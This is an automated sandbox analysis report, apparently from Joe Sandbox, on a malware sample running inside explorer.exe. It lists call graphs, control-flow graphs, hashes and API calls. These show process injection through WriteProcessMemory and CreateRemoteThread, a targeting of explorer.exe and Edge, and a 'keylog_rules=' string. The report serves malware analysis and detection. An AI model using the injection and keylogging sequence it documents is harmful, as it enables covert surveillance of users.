                                                                                                        callgraph 0 Function_00821000 1 Function_00822E80 2 Function_00821A04 3 Function_00821405 4 Function_0082A00A 5 Function_00823088 14 Function_00822E98 5->14 51 Function_00821B70 5->51 6 Function_00822E08 15 Function_00822418 6->15 35 Function_00821D50 6->35 46 Function_00821860 6->46 49 Function_008218E8 6->49 7 Function_00822508 33 Function_008225C4 7->33 36 Function_008218D0 7->36 45 Function_008224E0 7->45 8 Function_00821C08 9 Function_00821A88 10 Function_00821508 11 Function_0082188C 28 Function_00821838 11->28 12 Function_00822010 12->2 13 Function_0082B115 14->2 14->6 30 Function_00822CB8 14->30 39 Function_00821DD4 14->39 53 Function_00822B70 14->53 57 Function_00822BF4 14->57 15->28 40 Function_00822054 15->40 15->46 16 Function_0082141D 17 Function_00821822 18 Function_00823020 18->14 18->51 19 Function_00821D20 20 Function_00822620 21 Function_00823220 21->8 25 Function_00821C28 21->25 27 Function_00821BB0 21->27 21->28 29 Function_00821938 21->29 48 Function_00822860 21->48 21->51 22 Function_008241A1 23 Function_008245A7 24 Function_00829FAB 34 Function_0082A048 24->34 26 Function_008214B2 30->19 30->28 30->46 31 Function_00821F40 31->28 58 Function_008218F8 31->58 32 Function_00824A41 60 Function_008225FC 33->60 34->4 35->28 37 Function_00821254 38 Function_008214D4 39->28 40->11 40->12 40->28 40->29 40->31 40->36 40->46 52 Function_00821E70 40->52 40->58 41 Function_0082B0D5 42 Function_00821C58 43 Function_00824059 44 Function_0082355C 44->21 44->28 44->44 44->51 54 Function_008230F0 44->54 46->51 47 Function_00821560 48->20 48->51 56 Function_00822774 48->56 50 Function_0082156C 53->2 53->28 54->7 54->9 54->28 54->42 54->46 55 Function_00821576 59 Function_008214F9

                                                                                                        Executed Functions

                                                                                                        Function 0082355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 119 82355c-82356c call 821b70 122 823572-8235a5 call 821838 119->122 123 8235fc-823601 119->123 127 8235d1-8235f6 NtUnmapViewOfSection 122->127 128 8235a7 call 821838 122->128 132 823608-823617 call 823220 127->132 133 8235f8-8235fa 127->133 130 8235ac-8235c5 128->130 130->127 139 823621-82362a 132->139 140 823619-82361c call 82355c 132->140 133->123 134 823602-823607 call 8230f0 133->134 134->132 140->139
                                                                                                        APIs
                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 008235D8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, Offset: 00821000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_821000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: SectionUnmapView
                                                                                                        • String ID:
                                                                                                        • API String ID: 498011366-0
                                                                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                        • Instruction ID: 8bd715b8cdb27258873e3ca573d4dc486bc37f67a1337266efd3f6288b525948
                                                                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                        • Instruction Fuzzy Hash: FF119430615E195FEF58BBBCA8AD27937A4FB69302F54013AA419C76A1DA3D8A81C701
                                                                                                        Function 00823220 Relevance: 7.7, APIs: 5, Instructions: 241processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 823220-82325b call 821838 3 823261-823273 CreateToolhelp32Snapshot 0->3 4 823549-823554 SleepEx 3->4 5 823279-82328f Process32First 3->5 4->3 6 823538-82353a 5->6 7 823540-823543 CloseHandle 6->7 8 823294-8232ac 6->8 7->4 10 8232b2-8232c6 8->10 11 82348c-823495 call 821bb0 8->11 10->11 17 8232cc-8232e0 10->17 15 82352a-823532 Process32Next 11->15 16 82349b-8234a4 call 821c08 11->16 15->6 16->15 21 8234aa-8234b1 call 821c28 16->21 17->11 22 8232e6-8232fa 17->22 21->15 27 8234b3-8234c1 call 821b70 21->27 22->11 26 823300-823314 22->26 26->11 31 82331a-82332e 26->31 27->15 32 8234c3-823525 call 821938 call 822860 call 821938 27->32 31->11 36 823334-823348 31->36 32->15 36->11 41 82334e-823362 36->41 41->11 44 823368-82337c 41->44 44->11 46 823382-823396 44->46 46->11 48 82339c-8233b0 46->48 48->11 50 8233b6-8233ca 48->50 50->11 52 8233d0-8233e4 50->52 52->11 54 8233ea-8233fe 52->54 54->11 56 823404-823418 54->56 56->11 58 82341a-82342e 56->58 58->11 60 823430-823444 58->60 60->11 62 823446-82345a 60->62 62->11 64 82345c-823470 62->64 64->11 66 823472-823486 64->66 66->11 66->15
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.4174299297.0000000000821000.00000040.80000000.00040000.00000000.sdmp, Offset: 00821000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_821000_explorer.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 2482764027-0
                                                                                                        • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                        • Instruction ID: 8da1a4398fcdcce429c65f31612aec8507ddf25569fe7c4af2b3d236bfc75717
                                                                                                        • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                        • Instruction Fuzzy Hash: 868131312186188FEB06EF24FC58BEAB7A1FB60741F54466AA446C7160EF7CDA44CB81
                                                                                                        Function 0082A048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 68 82a048-82a04b 69 82a055-82a059 68->69 70 82a065 69->70 71 82a05b-82a063 69->71 72 82a067 70->72 73 82a04d-82a053 70->73 71->70 74 82a06a-82a071 72->74 73->69 76 82a073-82a07b 74->76 77 82a07d 74->77 76->77 77->74 78 82a07f-82a082 77->78 79 82a097-82a0a4 78->79 80 82a084-82a092 78->80 90 82a0a6-82a0a8 79->90 91 82a0be-82a0cc call 82a00a 79->91 81 82a094-82a095 80->81 82 82a0ce-82a0e9 80->82 81->79 84 82a11a-82a11d 82->84 85 82a122-82a129 84->85 86 82a11f-82a120 84->86 89 82a12f-82a133 85->89 88 82a101-82a105 86->88 92 82a107-82a10a 88->92 93 82a0eb-82a0ee 88->93 94 82a190-82a1e4 VirtualProtect * 2 89->94 95 82a135-82a14e LoadLibraryA 89->95 96 82a0ab-82a0b2 90->96 91->69 92->85 97 82a10c-82a110 92->97 93->85 101 82a0f0 93->101 98 82a1e8-82a1ed 94->98 100 82a14f-82a156 95->100 113 82a0b4-82a0ba 96->113 114 82a0bc 96->114 102 82a112-82a119 97->102 103 82a0f1-82a0f5 97->103 98->98 104 82a1ef-82a1fe 98->104 100->89 106 82a158 100->106 101->103 102->84 103->88 107 82a0f7-82a0f9 103->107 110 82a164-82a16c 106->110 111 82a15a-82a162 106->111 107->88 112 82a0fb-82a0ff 107->112 115 82a16e-82a17a 110->115 111->115 112->88 112->92 113->114 114->91 114->96 117 82a185-82a18f 115->117 118 82a17c-82a183 115->118 118->100
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNELBASE ref: 0082A147
                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0082A1BB
                                                                                                        • VirtualProtect.KERNELBASE ref: 0082A1D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.4174299297.0000000000827000.00000040.80000000.00040000.00000000.sdmp, Offset: 00827000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_17_2_827000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 895956442-0
                                                                                                        • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                        • Instruction ID: 2d34ec8003db4864a7734e0c0adba5202491a87c45e21cee3b5f88b45b4dbd25
                                                                                                        • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                        • Instruction Fuzzy Hash: CB512731758D3D8BCB2CAA78ACC46B5B7C1FF55335F58062AD48AC3285E959D8C68383

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_02F225F1 1 Function_02F29AE0 2 Function_02F21E66 21 Function_02F21CBF 2->21 3 Function_02F229E7 4 Function_02F21FEA 5 Function_02F229EB 29 Function_02F22724 5->29 6 Function_02F22569 7 Function_02F2276D 8 Function_02F2275A 9 Function_02F21ED8 10 Function_02F2255C 11 Function_02F217DC 43 Function_02F22A09 11->43 12 Function_02F22841 13 Function_02F226C9 14 Function_02F224CC 15 Function_02F21533 16 Function_02F21FB4 27 Function_02F21E26 16->27 17 Function_02F21F3A 17->2 17->4 17->16 22 Function_02F229BD 17->22 18 Function_02F216B9 18->5 18->11 19 Function_02F2293E 19->5 19->43 20 Function_02F218BF 23 Function_02F21BBD 20->23 26 Function_02F21B26 20->26 20->29 24 Function_02F2243D 42 Function_02F2298A 24->42 24->43 25 Function_02F220A1 25->5 25->14 25->22 25->24 25->42 25->43 46 Function_02F2240F 25->46 47 Function_02F2288D 25->47 27->21 28 Function_02F23627 30 Function_02F225A4 30->43 31 Function_02F210A5 31->5 31->7 31->8 31->12 31->13 31->20 31->29 34 Function_02F212AE 31->34 35 Function_02F226AE 31->35 31->43 45 Function_02F2268F 31->45 31->47 32 Function_02F2162B 32->18 33 Function_02F229AE 34->5 34->6 34->10 34->12 34->22 34->33 34->43 36 Function_02F213AE 36->0 36->5 36->17 39 Function_02F22799 36->39 36->43 44 Function_02F21E89 36->44 37 Function_02F2182D 37->5 37->30 37->33 37->43 48 Function_02F2200D 37->48 38 Function_02F21016 38->5 38->7 38->8 38->12 38->13 38->20 38->29 38->31 38->34 38->35 38->36 38->43 38->45 38->47 40 Function_02F21000 40->38 41 Function_02F21581 41->5 41->18 41->19 41->29 41->43 44->4 44->9 44->29 46->12 48->5 48->25 48->43

                                                                                                        Executed Functions

                                                                                                        Function 02F21016 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 193stringsleepprocessCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02F229F3,-00000001,02F2128C), ref: 02F22731
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02F21038
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F2106C
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02F21075
                                                                                                        • GetCurrentProcessId.KERNEL32(?,02F21010), ref: 02F2107B
                                                                                                        • wsprintfA.USER32 ref: 02F210E7
                                                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02F21155
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F21160
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 02F2117F
                                                                                                        • CharLowerA.USER32(?), ref: 02F21199
                                                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02F211B5
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F21212
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 02F2126C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F2127F
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 02F2129F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                        • API String ID: 3206029838-2805246637
                                                                                                        • Opcode ID: ab3a4ec9de356ff4f78175b0056dfc080fb4bf1d4b1b4d30045b56d7287d0a90
                                                                                                        • Instruction ID: d3fb2b44c83e1fc4a38df32432614dc901bb20f882fd9c03df14886b46a2f09e
                                                                                                        • Opcode Fuzzy Hash: ab3a4ec9de356ff4f78175b0056dfc080fb4bf1d4b1b4d30045b56d7287d0a90
                                                                                                        • Instruction Fuzzy Hash: F4510570E442295BD724EF70DC44A7BB7AAEB47BC4F010A28BB49972C1DB34990D8F61
                                                                                                        Function 02F210A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • wsprintfA.USER32 ref: 02F210E7
                                                                                                          • Part of subcall function 02F2276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02F22777
                                                                                                          • Part of subcall function 02F2276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02F210FE), ref: 02F22789
                                                                                                        • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 02F21155
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F21160
                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 02F2117F
                                                                                                        • CharLowerA.USER32(?), ref: 02F21199
                                                                                                        • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 02F211B5
                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02F21212
                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 02F2126C
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F2127F
                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 02F2129F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                        • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                        • API String ID: 3018447944-2805246637
                                                                                                        • Opcode ID: 5e48dd9153652e786798788f3fc5a78e4e9631bef502c7345e86507a1157d417
                                                                                                        • Instruction ID: 77a59c78602ea1920e8507b9a3285ca301c0c94fdfdd1fae6595a46553c304d6
                                                                                                        • Opcode Fuzzy Hash: 5e48dd9153652e786798788f3fc5a78e4e9631bef502c7345e86507a1157d417
                                                                                                        • Instruction Fuzzy Hash: BA41EB71A043255BD724EF648C84A7BB79AEB477D4F010918BF49972C1EB34D90D8F61
                                                                                                        Function 02F29AE0 Relevance: 6.2, APIs: 4, Instructions: 194COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 122 2f29ae0-2f29ae5 123 2f29aeb-2f29af8 122->123 124 2f29cad 122->124 125 2f29b0a-2f29b0f 123->125 124->124 126 2f29b11 125->126 127 2f29b13 126->127 128 2f29b00-2f29b05 126->128 129 2f29b18-2f29b1a 127->129 130 2f29b06-2f29b08 128->130 131 2f29b23-2f29b27 129->131 132 2f29b1c-2f29b21 129->132 130->125 130->126 131->129 133 2f29b29 131->133 132->131 134 2f29b34-2f29b39 133->134 135 2f29b2b-2f29b32 133->135 136 2f29b3b-2f29b44 134->136 137 2f29b48-2f29b4a 134->137 135->129 135->134 138 2f29b46 136->138 139 2f29bba-2f29bbd 136->139 140 2f29b53-2f29b57 137->140 141 2f29b4c-2f29b51 137->141 138->137 142 2f29bc2-2f29bc5 139->142 143 2f29b60-2f29b62 140->143 144 2f29b59-2f29b5e 140->144 141->140 145 2f29bc7-2f29bc9 142->145 146 2f29b84-2f29b93 143->146 147 2f29b64 143->147 144->143 145->142 150 2f29bcb-2f29bce 145->150 148 2f29ba4-2f29bb1 146->148 149 2f29b95-2f29b9c 146->149 151 2f29b65-2f29b67 147->151 148->148 153 2f29bb3-2f29bb5 148->153 149->149 152 2f29b9e 149->152 150->142 154 2f29bd0-2f29bec 150->154 155 2f29b70-2f29b74 151->155 156 2f29b69-2f29b6e 151->156 152->130 153->130 154->145 158 2f29bee 154->158 155->151 157 2f29b76 155->157 156->155 159 2f29b81 157->159 160 2f29b78-2f29b7f 157->160 161 2f29bf4-2f29bf8 158->161 159->146 160->151 160->159 162 2f29bfa-2f29c10 LoadLibraryA 161->162 163 2f29c3f-2f29c42 161->163 164 2f29c11-2f29c16 162->164 165 2f29c45-2f29c4c 163->165 164->161 166 2f29c18-2f29c1a 164->166 167 2f29c70-2f29ca0 VirtualProtect * 2 165->167 168 2f29c4e-2f29c50 165->168 169 2f29c23-2f29c30 GetProcAddress 166->169 170 2f29c1c-2f29c22 166->170 173 2f29ca4-2f29ca8 167->173 171 2f29c52-2f29c61 168->171 172 2f29c63-2f29c6e 168->172 174 2f29c32-2f29c37 169->174 175 2f29c39-2f29c3c 169->175 170->169 171->165 172->171 173->173 176 2f29caa 173->176 174->164 176->124
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F28000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F28000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f28000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4135ba2377cce62e9158bbc91fd009143de1bf4a8065c8168efe2ff047589653
                                                                                                        • Instruction ID: 9c748d3601187bdbc63fd48e8dbc5814f393dab40ec35e48576d83a8cd50c9ec
                                                                                                        • Opcode Fuzzy Hash: 4135ba2377cce62e9158bbc91fd009143de1bf4a8065c8168efe2ff047589653
                                                                                                        • Instruction Fuzzy Hash: AF51EA72E542728BD7218A78CC807A57794EB432A4F380739D6E5CB3C6E7D4590EC750
                                                                                                        Function 02F2276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 177 2f2276d-2f2277f OpenFileMappingA 178 2f22781-2f22791 MapViewOfFile 177->178 179 2f22794-2f22798 177->179 178->179
                                                                                                        APIs
                                                                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02F22777
                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,02F210FE), ref: 02F22789
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$MappingOpenView
                                                                                                        • String ID:
                                                                                                        • API String ID: 3439327939-0
                                                                                                        • Opcode ID: 0dc54c0e6cc7fc0ebe74eabf6a1ae08950c579bea2f8a51f19c45ffa023ccc64
                                                                                                        • Instruction ID: 6d8942ffca6115569cd95c9d87ee6d5cead323b34cd5d5e33c96754f06898cf6
                                                                                                        • Opcode Fuzzy Hash: 0dc54c0e6cc7fc0ebe74eabf6a1ae08950c579bea2f8a51f19c45ffa023ccc64
                                                                                                        • Instruction Fuzzy Hash: 93D01772F45232BBE3349A7B6C0CF83BE9DDF86EE5B020025B90DD2140D6648820C2F0
                                                                                                        Function 02F2275A Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 180 2f2275a-2f2276c UnmapViewOfFile CloseHandle
                                                                                                        APIs
                                                                                                        • UnmapViewOfFile.KERNEL32(00000000,?,02F2129A,00000001), ref: 02F2275E
                                                                                                        • CloseHandle.KERNELBASE(?,?,02F2129A,00000001), ref: 02F22765
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandleUnmapView
                                                                                                        • String ID:
                                                                                                        • API String ID: 2381555830-0
                                                                                                        • Opcode ID: 01b731a3d54e4a134f779fd3cc46b0daf220c0055981897e3fc99f66089199f8
                                                                                                        • Instruction ID: b64a2e9f895842cce492017f191bc8dd5f3b441708a0e4237679655595262d4f
                                                                                                        • Opcode Fuzzy Hash: 01b731a3d54e4a134f779fd3cc46b0daf220c0055981897e3fc99f66089199f8
                                                                                                        • Instruction Fuzzy Hash: 56B012B2C4903497C334A734780CCDBBE18EE4BAA530709C4F10D810044B2C081587F8
                                                                                                        Function 02F22A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 181 2f22a09-2f22a19 GetProcessHeap RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: da2af24a5e45c57c4bb2e595d1d812a728b3867f92d9f8eff71f4979265e48c7
                                                                                                        • Instruction ID: 39a4a3f262734af1c3b514da35106b02f528699d8e28843e7e77a6641c6f32d0
                                                                                                        • Opcode Fuzzy Hash: da2af24a5e45c57c4bb2e595d1d812a728b3867f92d9f8eff71f4979265e48c7
                                                                                                        • Instruction Fuzzy Hash: 38A002F1F901086BDD5897E4990DF15B658E745F45F0149847246C50409D79545C8735

                                                                                                        Non-executed Functions

                                                                                                        Function 02F218BF Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 208injectionnativesleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,02F229F3,-00000001,02F2128C), ref: 02F22731
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 02F218F4
                                                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02F2192F
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02F219BF
                                                                                                        • RtlMoveMemory.NTDLL(00000000,02F23638,00000016), ref: 02F219E6
                                                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02F21A0E
                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02F21A1E
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02F21A38
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 02F21A40
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21A4E
                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21A55
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02F21A6B
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02F21A72
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F21A88
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F21AB2
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F21AC5
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21ACC
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21AD3
                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02F21AE7
                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02F21AFE
                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21B0B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21B11
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02F21B17
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02F21B1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                        • String ID: atan$ntdll$opera_shared_counter
                                                                                                        • API String ID: 1066286714-2737717697
                                                                                                        • Opcode ID: fc83e5b8890e8723453ba292f661d3124405aeaab53867872c7eb746b66c6c31
                                                                                                        • Instruction ID: cd7c7800c3e5a066eb9abefa34e14d1da34a96e11ffa27472a3bf0451f555d91
                                                                                                        • Opcode Fuzzy Hash: fc83e5b8890e8723453ba292f661d3124405aeaab53867872c7eb746b66c6c31
                                                                                                        • Instruction Fuzzy Hash: 1F61A271A44319AFE320DF248C84E6BBBEDEB4A798F010959FA49D3241D774D908CB76
                                                                                                        Function 02F22799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02F227B5
                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02F227CD
                                                                                                        • lstrlen.KERNEL32(?,00000000), ref: 02F227D5
                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02F227E0
                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02F227FA
                                                                                                        • wsprintfA.USER32 ref: 02F22811
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 02F2282A
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F22834
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                        • String ID: %02X
                                                                                                        • API String ID: 3341110664-436463671
